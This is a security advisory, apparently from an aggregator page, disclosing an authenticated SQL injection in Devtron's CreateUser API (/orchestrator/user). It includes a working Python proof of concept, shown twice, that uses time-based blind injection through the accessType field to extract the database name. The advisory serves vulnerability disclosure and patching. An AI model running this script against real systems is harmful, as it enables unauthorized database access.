Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-q78v-cv36-8fxj: Devtron has SQL Injection in CreateUser API

Summary

An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo (line 104) parameter can be controlled by users.

The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.

The user should be authenticated but only needs minimum permissions: image

PoC

Demonstrate a blind SQL injection to retrieve the database name:

import requests
import time
import string
import argparse

def blind(ip, token, query):
    url = f"http://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    payload = f"'; {query} --"

    data = {"id": 111, "email_id": "[email protected]", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
    start = time.time()
    res = requests.post(url, headers=headers, json = data)
    end = time.time()
    #print(res.content)
    if(end - start > 1):
        return True
    return False

def main(ip, token):
    chs = string.printable
    result = ""
    is_end = False
    i = 1
    while(not is_end):
        is_end = True
        for ch in chs:
            if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")):
                print(ch)
                result += ch
                is_end = False
                break
        i += 1
    print(result)

if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--ip", "-i", type=str, help="Target IP")
    argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
    args = argparser.parse_args()
    main(args.ip, args.token)

The debugging breakpoint indicated that the malicious SQL query was executed: image

We can see that we can get the database name: image

Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected.

The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.

ghsa
#sql#vulnerability#js#git#auth

Summary

An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is:
https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo (line 104) parameter can be controlled by users.

The SQL injection can happen in the code:
https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.

The user should be authenticated but only needs minimum permissions:

PoC

Demonstrate a blind SQL injection to retrieve the database name:

import requests
import time
import string
import argparse

def blind(ip, token, query):
    url = f"http://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    payload = f"'; {query} --"

    data = {"id": 111, "email_id": "[email protected]", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
    start = time.time()
    res = requests.post(url, headers=headers, json = data)
    end = time.time()
    #print(res.content)
    if(end - start > 1):
        return True
    return False

def main(ip, token):
    chs = string.printable
    result = ""
    is_end = False
    i = 1
    while(not is_end):
        is_end = True
        for ch in chs:
            if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")):
                print(ch)
                result += ch
                is_end = False
                break
        i += 1
    print(result)

if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--ip", "-i", type=str, help="Target IP")
    argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
    args = argparser.parse_args()
    main(args.ip, args.token)

The debugging breakpoint indicated that the malicious SQL query was executed:

We can see that we can get the database name:

Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected.

The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.

References

  • GHSA-q78v-cv36-8fxj
  • devtron-labs/devtron@1540271

ghsa: Latest News

GHSA-3m9x-2qfj-xvq4: PHPExcel XXE Vulnerability